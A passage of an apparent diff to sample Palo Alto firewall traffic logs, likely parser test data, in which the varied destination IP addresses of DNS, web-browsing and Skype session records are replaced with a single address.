04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 
09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 
09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 +Oct 30 
09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 
04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
